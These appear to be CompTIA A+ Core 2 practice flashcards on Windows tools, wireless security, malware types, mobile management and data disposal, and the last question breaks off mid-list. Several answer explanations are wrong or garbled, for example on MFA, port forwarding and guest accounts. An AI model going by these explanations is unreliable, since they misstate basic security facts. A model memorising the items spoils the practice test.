CompTIA A+ Core 2 Practice Test Flashcards
An administrator uses a method that uses simultaneous authentication of equals (SAE) instead of the 4-way handshake. What is this method?
AES
MFA
TKIP
WPA3
WPA3
Wireless protected access (WPA3) uses passphrase-based group authentication of stations in private mode; it changes the method by which this secret is used to agree with session keys. The simultaneous authentication of equals (SAE) protocol replaces the 4-way handshake.
Multifactor authentication (MFA) allows the machine to establish a trust relationship and create a secure tunnel to transmit the user credentials or perform smart card authentication without a user password.
Temporal key integrity protocol (TKIP) tries to mitigate the various attacks against WEP developed by producing a new 128-bit encryption key for every packet sent on the network.
Advanced encryption standard (AES) is the standard encryption used by WPA2 and the strongest encryption standard to use by Wi-Fi.
What type of malware attack designates the victim’s computer to mine digital currency?
Trojans
Spyware
Cryptominer
Viruses
Cryptominer
Cryptominer hijacks the resources of the host to perform cryptocurrency mining. Cryptomining is often performed across botnets which are also referred to as cryptojacking.
Spyware is malware that can perform browser reconfigurations, such as allowing tracking cookies, changing default search providers, opening arbitrary pages at startup, adding bookmarks, and so on.
Viruses are concealed within the code of an executable process image stored as a file on a disk.
Trojans are malware concealed within an installer package for software that appears to be legitimate. The malware will be installed alongside the program and executed with the same privileges.
A software company hires a new app developer. The corporate network denies access when the developer tries to connect their phone. Why would the network deny access from the developer’s mobile phone?
Sluggish response time
App spoofing
Developer mode
High network traffic
Developer mode
The developer’s phone is in developer mode. The company’s Mobile Device Management (MDM) system blocks access to the network because developer mode can be used to install bootleg apps.
High network traffic is a bandwidth utilization issue; it would not cause access to the network to be denied.
App spoofing is when a malicious app will typically spoof a legitimate app by using a similar name and fake reviews and automated downloads to boost its apparent popularity.
Sluggish response time on a mobile device could be caused by malware, too many open apps, and a low battery charge, among other things. It would not cause the device to be denied network access.
A client administrator for a video game development company wants to upgrade machines to support five primary partitions. The developers work with a lot of large files and might even need partitions larger than 2 TB. Which of the following should the administrator use?
APFS
MBR
GPT
NTFS
GPT
One of the features of GPT is support for more than four primary partitions. Windows allows up to 128 partitions with GPT. GPT also supports larger partitions (2 TB+) and a backup copy of the partition entries.
An OS must be installed to a partition formatted using a compatible file system. For Windows, this means using the New Technology File System (NTFS).
The master boot record (MBR) partition style stores a partition table in the first 512-byte sector on the disk.
Where Windows uses NTFS and Linux typically uses ext3 or ext4, Apple Mac workstations and laptops use the proprietary Apple File System (APFS).
A technician uses filesystem-level encryption on some files that need to be encrypted on their device. What is this called?
EFS
Inheritance
Application security
Port security
EFS
The Encrypting File System (EFS) feature of the New Technology File System (NTFS) supports file and folder encryption. EFS is not available in the Home edition of Windows. The encryption key used by EFS is associated with the username and password.
Port security triggers are based on the Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP) port number used by the application protocol.
Application security triggers are based on the process that listens for connections.
Inheritance permission assigned to a folder is automatically inherited by the file and subfolder created under the folder.
A progressive healthcare provider sets up color-filter modes on client machines and tailors them to specific users who are color blind. Where can the healthcare administrator configure this?
Show hidden files
Accessibility
Windows Firewall
Accessibility
Ease of Access settings configures input and output options to best suit each user. There are three main settings groups. In Windows 11, it can be found under the Accessibility heading.
A file or folder can be marked as “Hidden” through its file attributes. Files marked as hidden are not shown by default but can be revealed by setting the “Show hidden files, folders, and drives” option.
Windows Defender Firewall determines which processes, protocols, and hosts can communicate with the local computer over the network.
In Account settings, email & accounts are where sign-in credentials for other accounts can be added, such as email or social networking, allowing quick access.
An administrator uses a method that assigns permissions and rights to a collection of user accounts. What is this called?
ACL
MFA
Least privilege
Security group
Security group
A security group is a collection of user accounts, as it is more efficient to assign permissions to a group than to assign them individually to each user.
Access control list (ACL) allows each access control entry (ACE) to identify a subject and its permissions for the resource. A subject could be a human user, a computer, or a software service.
Least privilege means that a user should be granted the minimum possible rights necessary to perform that job which can be complex to apply in practice.
Multifactor authentication (MFA) means that the user must submit at least two different credentials.
A security administrator is in charge of multiple locations in various countries. The administrator wants to set Coordinated Universal Time (UTC) on a test box to ensure logging is standardized. In Windows, where can the administrator set this?
Personalization
Time and Language
Internet Options
Privacy
Time and Language
The Time & Language settings page sets the correct date/time and time zone. Keeping the PC synchronized to an accurate time source is important for processes.
The Personalization settings allow users to select and customize themes, which set the appearance of the desktop environment.
Privacy settings govern what usage data Windows is permitted to collect, what device functions are enabled, and for which apps.
The Internet Options Control Panel applet exposes the configuration settings for Microsoft’s Internet Explorer (IE) browser. The Security tab restricts what types of potentially risky active content are allowed to run.
A vulnerability manager investigates their mobile environment for overall risk posture and starts with identifying legacy systems. Who determines when an Android version is at the end of life?
Microsoft
Apple
Vendor
Vendor
End-of-life policies and update restrictions for particular handsets are determined by the handset vendor rather than the overall Android authority.
Android is a smartphone/tablet OS developed by the Open Handset Alliance, primarily driven by Google. However, vendors can make their versions as well.
Microsoft has their cell phone, which runs an OS designed to work with a handheld portable device. This type of OS must have a touch-operated interface.
iOS is the operating system for Apple’s iPhone smartphone and original models of the iPad tablet. Like macOS, iOS is also derived from UNIX.
A threat actor uses a technique that instills statements through an unfiltered user response. What is this technique?
SQL injection
Brute force attack
XSS
Dictionary attack
SQL injection
SQL injection attack is when the attacker modifies one or more of the basic functions by adding code to some input accepted by the app, causing it to execute the attacker’s own set of SQL queries or parameters.
Cross-site scripting (XSS) attack exploits the fact that the browser is likely to trust scripts that appear to come from a site the user has chosen to visit.
A dictionary attack is when the software matches the hash to those produced by ordinary words found in a dictionary.
A brute force attack is when the software tries to match the hash against one of every possible combination it could be.
An employee disposes of a disk by grounding it into little pieces. What is this called?
Erasing/wiping
Degaussing
Shredding
Incinerating
Shredding
Shredding is when a disk is put into a mechanical shredder to be destroyed. A mechanical shredder works in much the same way as a paper shredder.
Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner.
Degaussing is when a hard disk is exposed to a powerful electromagnet that disrupts the magnetic pattern that stores the data on the disk surface.
Incinerating is when the disk is exposed to high heat to melt its components. It is performed in a furnace designed for media sanitization. Municipal incinerators may leave remnants.
A security engineer researches how to make backup and antivirus apps available to their iOS mobile devices. Where should the apps be pushed?
Business Manager
Security & Privacy
iCloud
Finder
Business Manager
A supervised macOS can be restricted in terms of app installation and uninstallation policies. Corporate apps can be pushed to devices via the Business Manager portal.
By default, macOS will only allow apps to be installed if downloaded from the Mac App Store. To allow the installation of download apps, go to System Preferences > Security & Privacy.
The Finder is the macOS equivalent of File Explorer in Windows. It lets the user navigate all the files and folders on a Mac.
iCloud is Apple’s online storage solution for its users. It provides a central, shared location for mail, contacts, calendar, photos, notes, reminders, and more across macOS and iOS devices.
A Linux server administrator notices a service they do not recognize, although the environment is quite big. They look at the help file for the ksh process, but the documentation seems poor. It does seem to indicate that it provides interactivity, however. What type of program is this?
Backup
Antivirus
Terminal
Updates
Terminal
The shell provides a command environment by which a user can operate the OS and applications. Many shell programs are available with Linux, notably Bash, zsh, and ksh (Korn shell).
Products such as Clam AntiVirus (ClamAV) and the Snort Intrusion Prevention System (IPS) can be used to block varied malware threats and attempts to counteract security systems.
apt-get is a command interface for the Advanced Packaging Tool (APT). APT is used by Debian distributions and works with .deb format packages.
Linux does not have an “official” backup tool. There are plenty of commercial and open-source backup products for Linux, however. Some examples include Amanda, Bacula, Fwbackups, and Rsync.
A spouse plans a surprise birthday party for their significant other. The spouse wants to turn off activity history on their browser to make sure their significant other does not find out the surprise. Where can the spouse do this?
Update and security
Internet Options
Privacy
Personalization
Privacy
Privacy settings govern what usage data Windows is permitted to collect, what device functions are enabled, and for which apps.
The Update & Security settings provide a single interface to manage a secure and reliable computing environment.
The Personalization settings allow the users to select and customize themes, which set the appearance of the desktop environment.
The Internet Options Control Panel applet exposes the configuration settings for Microsoft’s Internet Explorer (IE) browser. The Security tab is used to restrict what types of potentially risky active content are allowed to run.
A Windows administrator wants to learn how to use Linux by installing the Linux subsystem for Windows. What should their version of Windows have on the New Technology File System (NTFS) to support case-sensitive naming and hard links required by Linux?
POSIX
Journaling
32-bit allocation table
Indexing
POSIX
To support UNIX/Linux compatibility, Microsoft engineered NTFS to support case-sensitive naming, hard links, and other key features UNIX/Linux applications require. This is known as POSIX compliance.
When data is written to an NTFS volume, it is re-read, verified, and logged via journaling. In the event of a problem, the sector concerned is marked as bad and the data relocated.
FAT32 is a variant of FAT that uses a 32-bit allocation table, nominally supporting volumes up to 2 TB. The maximum file size is 4 GB minus 1 byte.
The Indexing Service creates a catalog of file and folder locations and properties, speeding up searches.
A server administrator sets up jobs that will copy over files on various servers. They want it to detect if the file was transferred successfully and, if not, resend the file. Which command is optimal for server administrators to perform this task?
move
robocopy
xcopy
copy
robocopy
Robocopy command (or “robust copy”) is another file copy utility. Microsoft now recommends using robocopy rather than xcopy. Robocopy is designed to work better with long file names and NTFS attributes.
The xcopy command is a utility that allows users to copy the contents of more than one directory at a time and retain the directory structure.
The move command provides the ability to transfer files contained in a single directory. It uses a three-part syntax: command Source Destination, where Source is the drive name, path, and name of the files to be moved/copied.
The copy command also allows transferring files contained in a single directory.
A penetration tester conducts the initial reconnaissance phase and is currently targeting externally facing servers for a certain company. Currently, they are trying to enumerate the domain name system (DNS) servers. Which built-in tool will help them perform this?
nano
find
cat
dig
dig
dig is a powerful tool for gathering information and testing name resolution, installed on most Linux distributions. Output is displayed in an answer section and includes the IP address mapped to the domain name.
The find command is used to search for files. This basic syntax is found in a path expression.
cat returns the contents of the files listed as arguments. The -n switch adds line numbers to the output. Often, cat output is piped to a pager (cat | more or cat | less) to control scrolling.
There are numerous text file editors. The Nano text editor is a basic example often preferred by those from a Windows environment.
A customer has opened a ticket for a problem to be fixed, and when the customer opens the ticket, there will be a record that shows what?
Follow up statement
Distractions
Proper documentation
Clarify customer statements
Proper documentation
Proper documentation should be provided so that the customer knows what to expect in terms of supported items, how long incidents may take to resolve, and when they can expect an item to be replaced instead of repaired.
Clarifying statements by asking how the customer expects the work to proceed and when it will be done, and their concerns about the costs and the impact of the work.
Following up with a customer to provide general feedback on what caused the issue, how it was fixed, and assurance that the issue is now fixed and unlikely to recur.
A distraction is anything that interrupts an employee from the task of resolving the ticket.
What uses domain names of components loading on the web page against a vast blacklist?
Browser sign-in
Private browsing mode
Ad blocker
Clearing browsing data
Ad blocker
Ad blockers use more sophisticated techniques to prevent displaying anything that does not seem to be part of the site’s main content or functionality.
Clearing browsing data options are used to delete browsing history. The user can have the browser do this automatically or do it manually.
Private browsing mode disables the caching features of the browser so that no cookies, browsing history, form fields, passwords, or temp files will be stored when the session is closed.
Browser sign-in allows the user to synchronize settings between instances of the browser software on different devices.
A technician configures a method to run some server application from a network and make it accessible to the internet. What is this method?
DHCP reservation
Port forwarding
Disabling unused ports
UPnP
Port forwarding
Port forwarding means that the router requests an internet host for a particular service and sends the request to a designated host on the LAN.
The Dynamic Host Configuration Protocol (DHCP) reservation means that the DHCP server always assigns the same IP address to the host. A user can usually choose which IP address this should be.
Disabling unused ports so that only the enabled services will be enabled. If a service is unused, then it should be accessible. If a port-forwarding rule is no longer required, it should be disabled or deleted completely.
The universal plug-and-play (UPnP) framework sends instructions to the firewall with the correct configuration parameters to allow applications to work.
A customer uses their computer at a café, and an attacker watches the customer typing their login information. What is this called?
Shoulder surfing
Phishing
Vishing
Tailgating
Shoulder surfing
Shoulder surfing attacks are when the attacker learns a password, PIN, or any secure information by watching the user type it.
Tailgating is when entering a secure area without authorization by following closely behind the person allowed to open the door or checkpoint.
Phishing uses social engineering techniques to make spoofed electronic communications seem authentic to the victim. A phishing message might convince the user to perform actions, such as installing malware disguised as an antivirus program.
Vishing is an attack through a voice channel like a telephone. It can be much more difficult for someone to refuse a request made in a phone call than one made in an email.
An IT technician is installing software on a device that inspects network traffic and accepts or blocks traffic based on a set of rules. What is this called?
PIN
Firewall
Swipe
Pattern
Firewall
Firewalls perform the role of filtering allowed and denied hosts and protocols. A basic firewall is configured with rules, referred to as a network access control list (ACL).
Swipe is a gesture that means that access to the device is unauthenticated. Simply swiping across the screen will unlock the device.
Pattern requires the user to swipe a “join-the-dots” pattern. The pattern method has numerous weaknesses.
Personal identification numbers (PINs) are used on most devices to enable screen lock authentication and generate an encryption key. The PIN can act as a primary or backup authentication method.
After starting the computer and signing in, a user notices the desktop takes a long time to load. Evaluate the following Windows operating system problems to determine the one that best diagnoses what could be causing the slowness.
Corrupted registry
Invalid boot disk
Corrupted user profile
Time drift
Corrupted user profile
When a computer starts normally, and a user logs in normally, the desktop is slow to load; a corrupted user file is likely a culprit.
Time drift occurs when the time on the motherboard and the server gets out of sync. Using GPS-synchronized time sources or a pool of internet sources will address time drift.
A corrupted registry likely would prevent the computer from booting, or it would boot to a blue screen of death (BSOD).
An invalid boot disk means the system has failed to boot, which is not true in this scenario.
An IT manager, who is in charge of the client image, considers enabling a data at rest solution. Where can the manager go to enable the built-in Microsoft solution?
Network and Sharing
Programs and Features
System Settings
Devices and Printers
System Settings
The System Settings page in the Settings app presents options for configuring input and output devices, power, remote desktop, notifications, and clipboard (data copying). BitLocker disk encryption is here.
The Devices and Printers applet in the Control Panel provides an interface for adding devices manually and shortcuts to the configuration pages for connected devices.
The Programs and Features Control Panel applet is the legacy software management interface. Users can use it to install and modify desktop applications and Windows Features.
Network and Sharing Center is a Control Panel applet that shows status information.
What uses a 4-way handshake to allow a station to associate with an access point, authenticate its credential, and exchange a key to use for data encryption?
TKIP
WPA3
WPA2
MFA
WPA2
Wi-Fi protected access 2 (WPA2) was designed to fix critical vulnerabilities in the earlier WEP standard. WPA2 used the AES cipher deployed within the counter mode, blocking the changing message CCMP.
Temporal key integrity protocol (TKIP) tries to mitigate the various attacks against WEP developed by producing a new 128-bit encryption key for every packet sent on the network.
Multifactor authentication (MFA) allows the machine to establish a trust relationship and create a secure tunnel to transmit the user credentials or perform smart card authentication without a user password.
Wi-Fi protected Access (WPA3) uses passphrase-based group authentication of stations in private mode; it changes the method this secret is used to agree with session keys.
A technician implements a type of authentication method used on Windows machines that once users are authenticated, they are trusted by the system. What is this method?
Kerberos
RADIUS
TACACS+
TKIP
Kerberos
Kerberos allows a user account to authenticate to a domain controller (DC) over a trusted local cabled segment. Kerberos facilitates single sign-on (SSO).
Terminal access controller access control system plus (TACACS+) is another way of implementing AAA. TACACS+ is often used in authenticating administrative access to routers, switches, and access points.
Remote authentication dial-up user service (RADIUS) is implementing the AAA server when configuring enterprise authentication. Rather than storing and validating user credentials directly, it forwards data between the RADIUS server and the supplicant without reading it.
Temporal key integrity protocol (TKIP) tries to mitigate the various attacks against WEP developed by producing a new 128-bit encryption key for every packet sent on the network.
What ensures that old data is destroyed by writing to each location on a hard disk drive?
Erasing/wiping
Incinerating
Standard formatting
Low-level formatting
Erasing/wiping
Erasing/wiping software ensures that old data is removed using zeroes or random patterns, leaving the disk in a “clean” state, ready to be passed to the new owner. This overwriting method is suitable for all but the most confidential data.
The standard formatting tool deletes partitions and writes a new file system that will only remove references to files and mark all sectors as useable.
A low-level formatting tool resets a disk to its factory condition. Most of these tools will now incorporate some sanitize function.
Incinerating is when the disk is exposed to high heat to melt its components. It is performed in a furnace designed for media sanitization. Municipal incinerators may leave remnants.
Which of the following log-in options require a user to touch a device that takes a digital print?
Facial recognition
OU
Fingerprint scanner
Security key
Fingerprint scanner
A fingerprint is a type of bio gesture authentication that uses a sensor to scan the unique features of the user’s fingerprint.
Facial recognition is the bio gesture that uses a webcam to scan the unique features of the user’s face. The camera records a 3-D image using its infrared (IR) sensor to mitigate attempts to use a photo to spoof the authentication mechanism.
Security key uses a removable USB token or smart card. It can also use a trusted smartphone with a near-field communication (NFC) sensor.
An organizational unit (OU) is a way of dividing a domain up into different administrative realms. OUs might be created to delegate responsibilities for administering company departments or locations.
The Instagram app on an Android phone will not launch. Which of the following options could fix the problem?
Software Update
Force Stop
AirDrop
Swiping
Force Stop
If an app fails to launch, first use Force Stop to quit it and try launching again. In Android, open Settings > Apps. Tap an app, then select Force Stop. In iOS, either swipe up or double-tap the physical Home button, then swipe the app up off the screen.
Swiping is a mobile gesture that serves several purposes, such as bringing up the notification bar in Android (swipe down from the top of the screen) and bringing up a list of apps in iOS (swipe up from the bottom).
AirDrop is an iOS feature that allows file transfer between iOS and macOS devices over Bluetooth.
Software Update is an iOS option. The comparable Android option is a System Update.
A company is using a credit card transaction that guarantees both customer’s card data and the company’s system are safe against fraudulent purchases and identity theft. What is this?
PCI DSS
Chain of custody
IRP
Open-source license
PCI DSS
Payment card industry data security standard (PCI DSS) regulations protect credit card transactions from fraud. There are specific cybersecurity control requirements; others mandate “best practices,” as represented by a particular industry or international framework.
An open-source license makes it free to use, modify, and share and makes the program code used to design it available.
An incident response plan (IRP) sets our procedures and guidelines for dealing with security incidents.
A chain of custody form records who collected the evidence, who has handled it subsequently, where they stored it, and must show access to the evidence at every point.
A security administrator for Linux systems in their demilitarized zone wants to ensure only some administrators can perform certain commands. Which of the following is best used to lock down certain commands?
chown
sudo
chmod
rm
sudo
The sudo (superuser do) command allows any account listed in the /etc/sudoers file user to run specified commands with superuser privilege level.
The chmod command can be used to secure files and directories, using either symbolic or octal notation. Only the owner can change permissions.
The command chown allows the superuser to change the owner of a file or directory. Note that this right is reserved to superuser or sudoer.
The rm command can be used to delete files. It can also be used with the -r option to delete directories.
What will block third-party cookies and enable strict tracking protection?
Private browsing mode
Ad blockers
Clearing cache
Pop-up blockers
Private browsing mode
Private browsing mode disables the caching features of the browser so that no cookies, browsing history, form fields, passwords, or temp files will be stored when the session is closed.
Clearing cache is used to delete browsing history. Browsers will maintain a history of pages visited, cache files to speed up browsing, and save text typed into form fields.
Ad blockers use more sophisticated techniques to prevent displaying anything that does not seem to be part of the site’s main content or functionality.
Pop-up blockers prevent a website from creating dialogs or additional windows. The pop-up technique was used to show fake advertisements and security warnings.
What is a type of employee device that must meet the profile that the company requires, and the employee will have to agree on the installation of corporate apps and to some level of oversight and auditing?
COBO
BYOD
COPE
CYOD
BYOD
Bring your own device (BYOD) is a mobile device owned by the employee. The mobile is usually the most popular with employees but poses the most difficulties for security and network managers.
A corporate-owned business only (COBO) device is the company’s property and may only be used for company business.
Corporate-owned, personally enabled (COPE) is when the company chooses and supplies the device and remains the company’s property. The employee may use it to access personal email, social media accounts, and personal web browsing.
Choose your own device (CYOD) is like COPE, but the employee can choose the device they want from a list.
A company has employees sign a document that enforces the importance of protecting the organization from the security and legal implications of employees misusing its equipment. What is this document?
Assigned users
Splash screen
Acceptable use policy
Procurement life cycle
Acceptable use policy
Acceptable use policy (AUP) sets out what someone can use a particular service or resource for.
The procurement life cycle includes approval request procedure changes, determining budgets, identifying a trusted supplier or vendor for the asset, deploying implementations for installing the asset in a secure configuration, maintenance, and disposal of implements.
Assigned users are when hardware assets such as workstations, laptops, smartphones, tablets, and software licenses might be assigned to individual user accounts.
The splash screen is a graphic design element that consists of a window containing an image, logo, and the current version of the software.
The operating system update on a user’s phone fails. The user verifies the phone’s connection to a wall outlet that leads to the office Wi-Fi. Which of the following could be responsible for the update failure?
NFC
WLAN
RADIUS
Metered network
Metered network
Updates may be blocked if a device is connected to a metered network. Additionally, if the operating system update is incompatible with the device model, it may cause the update to fail.
Remote Authentication Dial-in User Service (RADIUS) is a protocol used to manage remote and wireless authentication infrastructures.
Near-field communication (NFC) is mostly used for contactless payment readers, security ID tags, and shop shelf-edge labels for stock control.
A wireless local area network (WLAN) uses radios and antennas for data transmission and reception. Most WLANs are based on the IEEE 802.11 series of standards, better known as Wi-Fi. Since the user verified that the phone was connected to Wi-Fi, WLAN would not be an issue.
A technician must remove all corporate accounts and files from an employee’s device but leave personal applications, accounts, settings, and files untouched. What is this called?
Enterprise wipe
Remote wipe
Profile security requirements
Locator application
Enterprise wipe
Enterprise wipe can be performed against corporate containers only. The device must be enrolled with MDM.
Remote wipe allows users to remotely erase the data on the device if the device is stolen or lost.
Profile security requirements document the details of the secure implementation of a device. These policies are applied to different employees and different sites or areas within the site.
A locator application finds a device if it is lost or stolen. Once set up, the phone’s location can be tracked from any web browser when it is powered on.
A server administrator receives a report that the company’s external-facing web server is unresponsive. Rebooting the server would take too long, and they are not even completely certain the server would come back up. What utility should the administrator use to restart the website?
msconfig.exe
services.msc
regedit.exe
certmgr.msc
services.msc
The Services console (services.msc) starts, stops, and pauses processes running in the background. In order to make configuration changes, regedit.exe in this group of options would be used.
The System Configuration Utility (msconfig.exe) is used to modify various settings and files that affect how the computer boots and loads Windows.
The Certificate Manager (certmgr.msc) console shows which certificates have been installed and provides a mechanism for requesting and importing new certificates.
The Windows registry provides a remotely accessible database for storing operating system, device, and software application configuration information. The administrator can use the Registry Editor (regedit.exe) to view or edit the registry.
A user downloads a dating app from the Apple store and then gets requests for permission to access their camera; which of the following is the most likely cause of the permission requests?
Sideloaded app
Spoofed app
Locator app
Enterprise app
Spoofed app
A spoofed app is a malicious app that spoofs a legitimate app by using a similar name and fake reviews, and automated downloads to boost its apparent popularity. Once downloaded, it will act as spyware and may request permissions unrelated to its function.
Sideloading is downloading apps from a source other than a trusted store. In this scenario, the app was downloaded from the trusted Apple store.
An enterprise app is a custom corporate app.
A locator app is a cloud app that uses a mobile-device location service to identify its current position on a map and enable security features to mitigate theft or loss.
An administrator assists the human resources department in testing access to their new cloud-based training site. Unfortunately, the site cannot be accessed due to the organizational security policy. Which of the following should the administrator use to assist them?
diskmgmt.msc
taskschd.msc
certmgr.msc
lusrmgr.msc
certmgr.msc
The Certificate Manager (certmgr.msc) console shows which certificates have been installed and provides a mechanism for requesting and importing new certificates.
The Disk Management (diskmgmt.msc) console displays a summary of any fixed and removable disks, which includes hard disk drives (HDDs), solid-state drives (SSDs), and optical drives.
The Task Scheduler (taskschd.msc) runs software and scripts according to calendar or event triggers which would not help diagnose and troubleshoot internet connectivity issues.
The Local Users and Groups (lusrmgr.msc) console provides an advanced interface for creating, modifying, disabling, and deleting user accounts.
An attacker can access a computer by executing a lunchtime attack. Which of the following principles were NOT followed that led to this attack?
Secure/protect critical hardware.
Log off when not using the computer.
Disable guest accounts.
Secure PII and passwords.
Log off when not using the computer.
Log off when not in use is a habit that users must develop each time they leave a computer unattended. Policies can configure a screensaver that locks the desktop after a period of inactivity.
Secure personal identifiable information (PII) and passwords are when paper copies of personal and confidential data must not leave where they could be read or stolen.
Secure/protect critical hardware should be a must for users to be alert to the risk of physical theft of devices.
Disabling guest accounts allow unauthorized access to the computer and may provide some sort of network access too. It is only enabled to facilitate password-less file sharing in a Windows workgroup.
While browsing the internet, a user receives a pop-up that states, “We have detected a Trojan virus. Click OK to begin the repair process.” Out of fright, the user clicks OK. Given the following choices, what is the most likely outcome of the user’s response?
Unwanted notifications start popping up in Windows.
Nothing happens because Windows BitLocker blocks the Trojan virus.
User starts experiencing drive-by downloads.
UAC will need to be enabled.
Unwanted notifications start popping up in Windows.
Malware often targets the browser, so clicking on a website pop-up is likely to deliver some type of infection, such as adware, which will deliver unwanted notifications.
A drive-by download will infect a computer with malware because a user visited a malicious site. However, in this scenario, the user was not passive. They actively interacted with the pop-up to install the adware.
BitLocker is an encryption tool, not an antivirus tool.
User Account Controls (UACs) prevent the unauthorized use of administrative privileges. They are enabled by default but can be disabled.
Which of the following extensions combines a scripting language with hundreds of prebuilt modules called cmdlets that can access and change most components and features of Windows and Active Directory components and features?
.js
.py
.ps1
.sh
.ps1
.ps1 is the PowerShell script file. Microsoft provides the Windows PowerShell Integrated Scripting Environment (ISE) for rapid development.
.sh is the Linux shell script extension by convention. Every shell script starts with a shebang line that designates which interpreter to use, such as Bash or Ksh.
.js is the JavaScript file extension. JavaScript is a scripting language designed to implement interactive web-based content and web applications. Most web servers and browsers are configured with a JavaScript interpreter.
.py is the Python file extension. Python is a general-purpose scripting and programming language that can develop both automation scripts and software applications.
A technician uses a method where each server is configured with a public/private encryption key pair and identified by a host key fingerprint. What is this method?
SSH
RDP
VNC
VPN
SSH
Secure shell (SSH) is also a remote access protocol, but it connects to a command interpreter rather than a desktop window manager.
Remote desktop protocol (RDP) implement terminal server and client functionality. RDP authentication and session data are always encrypted.
A virtual private network (VPN) establishes a tunneled link that joins a local computer to a remote network. Establish a VPN link and then use a remote desktop to connect to a host on the private network.
Virtual network computing (VNC) is a freeware product similar to RDP. It works over TCP port 5900. Not all versions of VNC support connection security.
Which of the following uses a security shield icon for tasks that are protected under them?
Fingerprint
SSO
PIN
UAC
UAC
User account control (UAC) is a Windows security feature designed to protect the system against malicious scripts and attacks that could exploit the powerful privileges assigned to members of the Administrators group.
A personal identification number (PIN) can contain letters and symbols. It is a passcode used to process authentication of a user accessing a system.
A fingerprint is the type of bio gesture authentication that uses a sensor to scan the unique features of the user’s fingerprint.
Single sign-on (SSO) means that a user authenticates once to a device or network to access multiple applications or services.
A teenager hears from friends about a legitimate website to download games to their Samsung Galaxy phone that is not in the Google Play store. The teenager goes to the site and downloads some games. What best describes the teenager’s behavior?
APK sideloading
Bootlegging
Jailbreaking
Rooting
APK sideloading
APK (Android Package) is the file format for Android apps. APK sideloading refers to downloading apps from a source other than Google’s Play store.
Jailbreaking removes the protective seal and any operating system-specific restrictions to give users greater control over the device. iOS jailbreaking is accomplished by booting the device with a patched kernel.
Rooting or gaining root access on an Android-based phone means gaining super user-level access over the device.
A bootleg app is a software that illegally copies or imitates a commercial product or brand. In this scenario, the teenager used a legitimate site.
What group has complete privilege control over a system?
Standard
Power
Administrator
Guest user
Administrator
A user account from the administrator’s group can perform all management tasks and generally has very high access to all files and other objects in the system.
A guest user is a group only present for a legacy reason. It has the same default permissions and rights as the user group.
A standard account is a member of the users group. This group is generally only able to configure settings for its profile.
The power users groups are present to support legacy applications. This group has the same permissions as the standard user group.
A user likes to watch Netflix on their phone while on the treadmill. The user turns the phone sideways for better viewing, but this time, the picture did not orient to landscape as it always has. Which of the following could cause this issue?
Screen lock is disabled.
Rotation lock is enabled.
Screen lock is enabled.
Rotation lock is disabled.
Rotation lock is enabled.
When a screen does not autorotate, it could be that the rotation lock is enabled. In iOS, the rotation lock is found in the Control Center. In Android, the rotation lock is found in the navigation bar.
If the rotation lock is disabled, the screen should autorotate. If it does not, the problem is probably hardware-related.
Screen Lock is a security feature for mobile devices. If enabled, it activates if the device is unused or the user activates it. Most devices require a pin or password to unlock the screen.
Screen Lock is a security feature for mobile devices. If it is disabled, no pin or password is required. Generally, some swipe gestures will unlock the screen.
A user calls the help desk complaining that Windows freezes to a blue screen every time it tries to boot. When the technician arrives, they boot the computer in Safe Mode. After evaluating this situation, what is the BEST reason the technician wants to enter Safe Mode to begin troubleshooting?
Safe Mode is necessary for troubleshooting.
CHKDSK can be run in Safe Mode.
Antivirus scans can be run in Safe Mode.
Safe Mode loads only the minimum amount of drivers and services to start the system.
Safe Mode loads only the minimum amount of drivers and services to start the system.
By using only essential drivers and services to boot, Safe Mode can boot the computer when a normal boot fails, as in this scenario.
The blue screen of death (BSoD) is mostly due to faulty hardware, especially at startup. CHKDSK scans the hard drive to find and repair errors, and it can be run in Safe Mode and many other analysis and recovery tools.
Safe Mode allows antivirus scans to run in an environment that will not trigger viruses or malware.
While Safe Mode provides a favorable environment for troubleshooting, it is not required to use the many troubleshooting tools available in Windows, such as Task Manager, Resource Manager, and Device Manager.
What is referred to as data on persistent storage like HDDs, SSDs, and thumb drives?
Data-at-rest encryption
Use timeout/screen lock
Disable Autoplay
Disable AutoRun
Data-at-rest encryption
Data on persistent storage, like HDDs, SSDs, and thumb drives, is known as data-at-rest. To protect data-at-rest against these risks, the information stored on a disk can be encrypted.
Disable AutoRun so that malware can not be installed automatically. Some versions of Windows require an optical disc inserted or USB drive to be attached so that the AutoRun command installs.
Disabling Autoplay will make the computer unable to play new content automatically.
Use timeout/screen lock is when the desktop is locked if the system detects no user-input device activity. Users should not rely on this and lock the computer manually when leaving it unattended.
A security administrator for a defense contracting company wants to disable external devices. The administrator pushes out a group policy setting to disable such devices but worries that attackers might elevate privileges and reenable them. What other setting will help the administrator accomplish the objective?
Modern standby
Selective suspend
Fast startup
Hibernate
Selective suspend
The administrator can enable Universal Serial Bus (USB) selective suspend to turn off power to peripheral devices.
The fast startup uses the hibernation file to instantly restore the previous system RAM contents and make the computer ready for input more quickly than the traditional hibernate option.
Hibernate mode suspends to disk. It saves any open but unsaved file data in memory to disk (as hiberfil.sys in the root of the boot volume) and then turns the computer off, which is also referred to as ACPI mode S4.
Modern standby utilizes a device’s ability to function in an S0 low-power idle mode to maintain network connectivity without consuming too much energy.
A marketing professional normally sends large files to other team members. The IT department recommended using a shared drive and assisted them in setting it up. The project was a very high priority, so the professional collaborated with several members but started receiving reports that some users could not access it sometimes and others could. They eventually figured out that only 20 people at a time seemed to be able to access it. What is causing the issue?
DNS settings are intermittent.
The file server was not properly configured.
The proxy settings are not properly configured on client machines.
The share was created on a Windows desktop.
The share was created on a Windows desktop.
The Share tab in the folder’s Properties dialog can customize permissions, change the share name, and limit the number of simultaneous connections. Windows desktop versions are limited to 20 inbound connections.
If more than 20 users access the share, the data should be stored on file servers rather than local client computers.
The proxy settings will not affect users’ ability to access the file share in this scenario. It could cause issues accessing the internet, however.
If the domain name system (DNS) were causing an issue, the users would not be limited to 20 people. It is possible that load-balanced DNS servers could cause issues if one is incorrect.
A server administrator was called in to help a VIP whose computer was accidentally infected with a virus. The administrator wants to revert the computer but still preserve user personalization settings. What should the administrator use?
Factory partition
Refresh
Reset
Third-party drivers
Refresh
Windows supports refresh and reset options to try to repair the installation. Using refresh recopies the system files and reverts most system settings to the default but can preserve user personalization settings, data files, and more.
Using the full reset option deletes the existing OS plus apps, settings, and data ready for the OS to be reinstalled.
A factory recovery partition is a tool used by the original equipment manufacturers (OEMs) to restore the OS environment to its ship state. The recovery partition is created on the internal fixed drive.
The OS setup media might not contain drivers for certain hardware devices, but this could be part of an unattended file.
A client uses this software that allows access to a given computer. What is this software?
Desktop management
Videoconferencing
Screen-sharing
